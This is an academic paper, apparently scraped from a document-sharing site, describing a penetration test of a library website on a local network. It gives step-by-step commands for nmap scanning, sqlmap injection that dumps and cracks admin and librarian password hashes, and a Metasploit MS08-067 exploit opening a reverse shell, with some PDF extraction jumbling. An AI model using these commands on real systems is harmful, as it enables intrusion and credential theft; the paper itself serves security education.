Evaluating Website Security with Penetration Testing Methodology

Similar documents
SECURITY TESTING: WINDOWS OS

Penetration Testing with Kali Linux

Cyber Security & Ethical Hacking Training. Introduction to Cyber Security Introduction to Cyber Security. Linux Operating System and Networking: LINUX

Chapter 5: Vulnerability Analysis

Jacksonville Linux User Group Presenter: Travis Phillips Date: 02/20/2013

Advanced Ethical Hacking & Penetration Testing. Ethical Hacking

Hacker Academy Ltd COURSES CATALOGUE. Hacker Academy Ltd. LONDON UK

Module 1: Penetration Testing Planning and Scoping. Module 2: Basic Usage of Linux and its services

CPTE: Certified Penetration Testing Engineer

Web Penetration Testing

Metasploit. Installation Guide Release 4.4

Coding for Penetration

Ethical Hacking and Prevention

Modern Day Penetration Testing Distribution Open Source Platform - Kali Linux - Study Paper

What action do you want to perform by issuing the above command?

Hacking Our Way to Better Security: Lessons from a Web Application Penetration Test. Tyler Rasmussen Mercer Engineer Research Center

Change Management: DYNAMIC NETWORK MAPPING. LinuxWorld San Francisco Security Track. Presented by Joshua D. Abraham.

BraindumpsIT. BraindumpsIT - IT Certification Company provides Braindumps pdf!

On Assessing the Impact of Ports Scanning on the Target Infrastructure

CyberP3i Hands-on Lab Series

Introduction to Penetration Testing: Part One. Eugene Davis UAH Information Security Club February 21, 2013

ETHICAL HACKING LAB SERIES. Lab 13: Exploitation with IPv6

Coding for Penetration Testers Building Better Tools

Penetration Testing following OWASP. Boyan Yanchev Chief Technology Ofcer Peter Dimkov IS Consultant

Project 4: Penetration Test

CS 410/510: Web Security X1: Labs Setup WFP1, WFP2, and Kali VMs on Google Cloud

A Model for Penetration Testing

GAUTAM SINGH STUDY MATERIAL SOFTWARE QUALITY Unit 17. Metasploit

3. Apache Server Vulnerability Identification and Analysis

ETHICAL HACKING & COMPUTER FORENSIC SECURITY

Penetration testing a building automation system

OWASP Broken Web Application Project. When Bad Web Apps are Good

Lecture 7: Web hacking 3, SQL injection, Xpath injection, Server side template injection, File inclusion

01/02/2014 SECURITY ASSESSMENT METHODOLOGIES SENSEPOST 2014 ALL RIGHTS RESERVED

Certified Secure Web Application Engineer

TexSaw Penetration Te st in g

Web Security, Summer Term 2012

Principles of ICT Systems and Data Security

CISSP CEH PKI SECURITY + CEHv9: Certified Ethical Hacker. Upcoming Dates. Course Description. Course Outline

Nmap & Metasploit. Chun-Jen (James) Chung. Arizona State University

Port Scanning A Brief Introduction

Host Identity Sources

Cyber Common Technical Core (CCTC) Advance Sheet Windows Operating Systems

Preview from Notesale.co.uk Page 3 of 36

Hands-On Ethical Hacking and Network Defense Chapter 5 Port Scanning

HHC 2017 writeup, by RedTeam611

Cross Platform Penetration Testing Suite

AURA ACADEMY Training With Expertised Faculty Call Us On For Free Demo

ECCouncil Exam v9 Certified Ethical Hacker Exam V9 Version: 7.0 [ Total Questions: 125 ]

Penetration testing using Kali Linux - Network Discovery

You can find the lab demo here:

Ethical Hacking Foundation Exam Syllabus

ISDP 2018 Industry Skill Development Program In association with

Tools for Security Testing

Web Application Penetration Testing

Assessment. automation: Deux ex Machina. Rube Goldberg Machine? 2005 LAS VEGAS

Security Testing. - a requirement for a secure business. ISACA DAY in SOFIA. Gabriel Mihai Tanase, Director, Cyber Services KPMG in CEE

Advanced Penetration Testing

CoreMax Consulting s Cyber Security Roadmap

Hackveda Training - Ethical Hacking, Networking & Security

DIS10.1 Ethical Hacking and Countermeasures

Scanning. Course Learning Outcomes for Unit III. Reading Assignment. Unit Lesson UNIT III STUDY GUIDE

NETWORK PENETRATION TESTING

Question No: 1 After running a packet analyzer on the network, a security analyst has noticed the following output:

Hands-On Ethical Hacking and Network Defense Chapter 6 Enumeration

AUTHOR CONTACT DETAILS

Curso: Ethical Hacking and Countermeasures

PracticeDump. Free Practice Dumps - Unlimited Free Access of practice exam

Kali Linux Network Scanning Cookbook Books

Hands-On Ethical Hacking and Network Defense Chapter 6 Enumeration

Lab 2: Creating Secure Architectures

CyberSecurity. Penetration Testing. Penetration Testing. Contact one of our specialists for more information CYBERSECURITY SERVICE DATASHEET

Hands-On Ethical Hacking and Network Defense Chapter 6 Enumeration

Lab 3: Introduction to Metasploit

CSWAE Certified Secure Web Application Engineer

CSC 5930/9010 Offensive Security: OSINT

Vulnerability Validation Tutorial

Audience. Pre-Requisites

Hands-On Ethical Hacking and Network Defense Chapter 5 Port Scanning

Assessment 1 Task 3 Explain the following security risks SQL Injection Cross Site Scripting XSS Brute Force Attack/Dictionary Attack

Why bother? Causes of data breaches OWASP. Top ten attacks. Now what? Do it yourself Questions?

INF5290 Ethical Hacking. Lecture 3: Network reconnaissance, port scanning. Universitetet i Oslo Laszlo Erdödi

Your Turn to Hack the OWASP Top 10!

Specialized Security Services, Inc. REDUCE RISK WITH CONFIDENCE. s3security.com

DIS10.1:Ethical Hacking and Countermeasures

Certification Report

Practice Labs Ethical Hacker

Contents in Detail. Foreword by Peter Van Eeckhoutte

Exam Questions v8

Software Vulnerability Assessment & Secure Storage

FRONT RUNNER DIPLOMA PROGRAM Version 8.0 INFORMATION SECURITY Detailed Course Curriculum Course Duration: 6 months

Penetration Testing and Fuzzing. John Slankas

Certification Report

Building a Web-based Health Promotion Database

CNIT 129S: Securing Web Applications. Ch 4: Mapping the Application

n Given a scenario, analyze and interpret output from n A SPAN has the ability to copy network traffic passing n Capacity planning for traffic

Database Security Service. FAQs. Issue 19 Date HUAWEI TECHNOLOGIES CO., LTD.

EC-Council V9 Exam

The SANS Institute Top 20 Critical Security Controls. Compliance Guide

Foundstone 7.0 Patch 6 Release Notes

Transcription:

Evaluating Website Security with Penetration Testing Methodology D. Menoski, P. Mitrevski and T. Dimovski St. Clement of Ohrid University in Bitola/Faculty of Technical Sciences, Bitola, Republic of Macedonia dragan.menoski@gmail.com, {pece.mitrevski, tome.dimovski}@uklo.edu.mk Abstract - Penetration testing on a website is discussed in this paper, in order to discover security vulnerabilities that may exist. The test is performed against a library CMS website, hosted in the same LAN with the attacker machine. The website is implemented using PHP and MySQL database, whereas sophisticated tools from the BackTrack 5 R3 Operating System are used for testing purposes. In addition to discovered vulnerabilities, some suggestions on improving website security are considered, as well. I. INTRODUCTION Penetration testing (PenTest) [1] is the process of conducting security assessment, or audit, which defines a set of rules, practices, methods and procedures [2] that must be followed during the process execution. PenTest includes proven practices, which should be handled with great care in order to correctly assess system security. There are three types of penetration testing: Black-box testing the auditor that uses this approach will be assessing the network infrastructure from a remote location and does not have any prior knowledge about the technologies that are used in the system that will be tested. This approach is known as external testing and the auditor is known as black-hat. White-box testing - typical for this approach is that the auditor is aware about the internal technologies that are used in the environment that will be tested. Considering fact that the auditor already has some information about the technologies used in the system, this type of testing can produce better results compared with the black-box type. This type is known as internal testing and the auditor is called whitehat. Gray-box - The combination of the previous types of testing is called Gray-box. This combination takes advantage of both types and the auditor that uses this type is known as grayhat. The penetration testing process in divided in several phases: target scoping, information gathering, target discovery, enumeration target, vulnerability mapping, social engineering, target exploitation, privilege escalation, maintaining access, documentation and reporting [3]. These phases are used entirely in a blackbox type, while in white-box the phases such as target scoping, information gathering and target discovery may be omitted, because of the fact that the white-hat auditor has prior knowledge about the system that shall be tested. II. WEB SITE TESTING A. Defining the type of testing As mentioned previously, the website is on a localhost and is in the same LAN with the machine that will perform the testing. The site has been developed using the PHP programming language and a MySQL database. Having this information in mind, the testing would be categorized as a white-box testing. B. Target discovery Although it is known that the target machine and the auditor s machine are in the same LAN, the IP address of the target machine still remains unknown. In order to find the IP address, one can make a scan for the host in a LAN using the genlist tool [4]. To run the scan, after opening the terminal (Ctrl+Alt +T), the following command has to be typed: # genlist -s 192.168.1.\* genlist is a command to run the tool, -s is a parameter that tells the tool to perform host scanning and 192.168.1.\* is a value for the previous parameter and this value specifies the scope where the scanning shall be done. The result from the scanning is shown below: 192.168.1.1 192.168.1.2 192.168.1.121 There are 3 IP addresses listed. With the ifconfig command an auditor can check its own IP address, and in this case it is 192.168.1.121. The 192.168.1.1 is obviously the IP address of the router. Consequently, 192.168.1.2 must be the IP address of the machine where the website is hosted. The next step is to find which operating system is used by the host machine. For that purpose xprobe2 tool can be used. To run this tool, the auditor should navigate from BackTrack 5 R3 menu to the following path: Applications > BackTrack > Information Gathering > Network Analysis > OS Fingerprinting > xprobe2. xprobe2 needs

to be started with root privileges, because it uses a raw socket to send the probes. To get the operating system info, the following command should be executed: # sudo xprobe2 192.168.1.2 sudo is an abbreviation from Super user do and means that the tool will be started with root privileges. It is followed by the name of the tool, and the IP address of the target machine. The main part from the result of this command is listed below: [+] Primary network guesses: [+] Host 192.168.1.2 Running OS: Microsoft Windows XP SP2 (Guess probability: 100%) From this part, one can conclude that the target machine uses Windows XP Service Pack 2 OS. C. Enumerating Target In this phase, the auditor collects information about the ports and the services that are available on the target environment. This information is used later to identify the vulnerabilities that may exist on the target machine. The nmap tool, that is a port scanner, can be used to scan ports and discover services that listen on these ports. In order to disclose TCP ports, the following command shall be used: # nmap -st 192.168.1.2 The result from the previous command is shown below: Not shown: 995 closed ports PORT STATE SERVICE 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open micosoft-ds 3306/tcp open mysql MAC Address: 00:0F:EA:56:EB:BB From the result, it can be concluded that the host has 5 open tcp ports, and that port 80 has a http server, whereas on port 3306 is the MySQL server. To make a scan for udp ports, the following command shall be executed: # nmap -su 192.168.1.2 With amap the application that is running on a specific port can be checked. This tool sends a trigger packet to the port and compares the response to its database. To run amap, one should navigate from BackTrack 5 R3 menu to the following path: Applications > BackTrack > Information Gathering > Network Analysis > Service Fingerprinting > amap. From the result of nmap it is known that there is some http server on port 80 and MySQL server on port 3306. So, with amap, additional information can be obtained about these 2 services. To get that information, the following command shall be executed: # amap -bq 192.168.1.2 80 3306 amap is the name of the tool that shall be used, -bq is a parameter meaning show banner information and do not show closed and unidentified ports. The next is the IP address of the machine where the scan shall be done and, at the very end, ports that shall be scanned for services are enumerated. The main part of the result from execution of this command is shown below: Protocol on 192.168.1.2:80/tcp matches http - banner HTTP/1.1 200 OK Server Apache/2.4.4 (Win32) PHP/5.4.16 x-powered by PHP/5.4.16 Content-Length 4192 Connection close Protocol on 192.168.1.2:3306/tcp matches mysqlsecured - banner: FjHost '192.168.1.121' is not allowed to connect to this mysql serevr. From the result, it can be seen that port 80 is listened to by Apache Server version 2.4.4 and the host has installed PHP version 5.4.16. About the mysql server, there is no extra info like version number, because the machine has no privileges to establish a connection. Httprint is an application that can be used to detect an HTTP server software and version. This tool will only identify HTTP servers that it knows about. To work with httprint the auditor must be sure that there is no HTTP proxy between his machine and the target machine. To run this tool, one must navigate, via terminal, to the following location: /penttest/enumeration/web/httprint/ linux. To get information about the HTTP server, the folowing command must be executed: #./httprint -h 192.168.1.2 -s signatures.txt./httprint will run the tool, the -h parameter defines the host where the tool will be looking for http servers and, in this case, the host is 192.168.1.2. The -s parameter defines the name and the extension of the file that represents the store for servers signatures. The result from execution of this command is shown below: Host: 192.168.1.2 Derivered Signature: Apache/2.4.4 (Win32) PHP/5.4.16 Banner Reported: Apache/2.4.4 (Win32) PHP/5.4.16 Banner Deduced: Apache/2.0.x This result confirms the information about the server that was received from amap. An experienced Penetration Tester should always confirm the results by two or more tools, because it increases the level of accuracy of the result [5],[6],[7],[8]. It is not a good practice to 100% rely only on the results of a single tool. D. Vulnerability Mapping The auditor, in this phase, performs identification and makes analysis on the critical security flaws in the target system. SQLMap is an automatic SQL injection tool that is used for scanning, detecting and exploiting the SQL injection flaws for a given URL. This tool has support for several database management systems such as MS-SQL,

MySQL, Oracle and PostgreSQL. To run this tool, one should navigate to the following location via terminal: /pentest/database/sqlmap. To see all the commands that are offered by SQLMap, the following command in the previously mentioned location should be executed: # python sqlmap.py h In order to see all the databases that exist on the MySQL database server, the following command has to be executed: index.php?category=1 --dbs python means that a script that is written in the Python programming language should be executed: sqlmap.py is the name of the python script that will be executed. The execution of this script will run the sqlmap tool. The -u parameter is used to specify the url where the sqlmap will make SQL injection attack. http://192.168.1.2/library/ index.php?category=1 is the value for the previously mentioned parameter. The --dbs is used to show all the databases that will be found. It is important to note that the names of databases will be listed only if the specified URL is prone to SQL injection. The results that are obtained with executing the abovementioned command are listed below: available databases [5]: [ * ] library [ * ] information_shema [ * ] mysql [ * ] performance_shema [ * ] test From the result we can see that the website is prone to SQL injection and there are 5 databases in the MySQL Server. From the names of databases it is easy to understand that the library is the database that is used for storing the data for our website. When using SQLMap, one must not forget that notice that is given by the same tool: [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program. The next step is to discover all the tables in the library database. To do so, one needs to execute the following command: index.php?category=1 --tables -D library --tables parameter tells to SQLMap to show all the tables and the -D specifies the name of the database where SQLMap will be looking for tables. In this case the value of -D parameter is library. The result obtained from executing the previous command is shown below by the names of the tables one can assume that in the tables admin and librarians data about the website's accounts is stored. According to the assumption the next step will be showing all the columns from these two tables. [6 tables] admin librarians members category book subcategory The commands that will show the tables are listed below: index.php?category=1 -D library -T admin index.php?category=1 -D library -T librarians The result from the execution of the first command is: Table: admin [5 columns] Column hashed_password Id first_name last_name Username Type int(11) The result from the execution of the second command is: Table: librarians [6 columns] Column Email hashed_password id first_name last_name username Type int(11) According to the names of the columns (e.g. username, hashed_password and email) our assumption that sensitive data is stored in these two tables seems to be true. The next step will be to extract data from these tables. To do so, one needs to execute the following commands: index.php?category=1 --dump -D library -T admin index.php?category=1 --dump -D library -T librarians --dump is parameter that tells SQLMap to extract the data from the table that is specified as a value for the -T parameter. The results from the previous two commands are shown in Figs. 1 and 2, respectively. From the result shown in Fig. 1, one can see that the website has two administrators (e.g. dmenoski and gjmenoski). The passwords for the administrators are not stored as plain text rather, they are encrypted.

E. Target Exploitation Figure 1. Data from admin table In this phase, the auditor tries to exploit the vulnerabilities that are found during the previous phases in order to get control over the target system. With the xprobe2 we discover that the host machine use Microsoft Windows XP Service Pack 2 OS. With this information, we can search for already known vulnerabilities for this operating system. We found that, with MFSConsole, which is included in the Metasploit Framework, full access on the machine can easily be obtained. In order to exploit the target machine, one needs to open a terminal and type the following commands: Figure 2. Data from librarians table mfsconsole run the tool. From the result shown on Fig. 2, one can see that the website has three librarians (e.g. librarian, cristiano and kaka). The passwords for the librarians are also encrypted, but in the process of getting the data, SQLMap recognized that they are stored password hashes and asks the following question: analyzing table dump for possible password hashes recognized possible password hashes in column 'hashed_password'. Do you want to crack them via a dictionary based attack? [Y/n/q] Answering to this question with Y (yes), SQLMap will ask another question: what dictionary do you want to use? [1] default dictionary file 'pentest/database/sqlmap/txt/ wordlist.txt' (press Enter) [2] custom dictionary file [3] file with list of dictionary files > To this question we answer with choosing the first option. And the last question that is asked from SQLMap is: do you want to use common password suffixes? (slow) [y/n] The answer to this question is N (No). So, SQLMap tries to get the plain text of the encrypted password and it is successful for the first and the third librarian. The password as plain text is shown under the hashed_password column, surrounded in parentheses. The passwords for the first and the third librarian accounts were successfully cracked because the first was the same as the username and the second contained only three digits. This is a mistake belonging to the users when creating their accounts. Namely, the password should never be the same as the username, and it should contain more than 6 characters including alphabet letters, digits and special characters. The SQLMap does not recognize that there are hashes for password in admin table. But we can try to decrypt these hashes using some of the tools for password cracking. use exploit/windows/smb/ms08_067_netapi show options - show available options set RHOST 192.168.1.2 - set IP address of the target machine as RHOST set PAYLOAD windows/shell/reverse_tcp - set value for payload show options - show available options for payload set LHOST 192.168.1.121 - set IP address of the auditor's machine exploit - start process of exploitation In a short period of time, the console of the target machine will be shown. We can execute any command on the target machine. To confirm that everything is OK, we can simply create new folder in the C: drive with the commands: # cd.. # cd.. # mkdir test III. CONCLUSION From the penetration testing that was performed on a local library website, one can see that several vulnerabilities were successfully exploited. Firstly, as one of the main drawbacks was that the host machine did not have a firewall. The system administrator should install the firewall with a proper configuration. In addition, the operating system of the target machine was easily vulnerable. As a solution for this issue, one can install patches for all known vulnerabilities or install a newer and more secure OS. The web site is prone to SQL injection attack. As a protection for this type of attack, the programmers that build the site should implement proper validation and string escaping for all inputs. REFERENCES [1] T. Wilhelm, Professional Penetration Testing, Second Edition, Elsevier, 2013

[2] EC-Council, Penetration Testing Procedures and Methodologies, EC-Council Press, 2011 [3] J. Andress and R. Linn, Coding for Penetration Testers, Elsevier, 2012 [4] J. Faircloth, Penetration Tester's Open Source Toolkit, Third Edition, Elsevier, 2011 [5] L. Allen, Advanced Penetration Testing for Highly-Secured Environments The Ultimate Security Guide, Packt, 2012 [6] W. L. Pritchett and D. De Smet, Kali Linux Cookbook, Packt, 2013 [7] A. Singh, Metasploit Penetration Testing Cookbook, Packt, 2012 [8] J. Muniz and A. Lakhani, Web Penetration Testing with Kali Linux, Packt, 2013

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback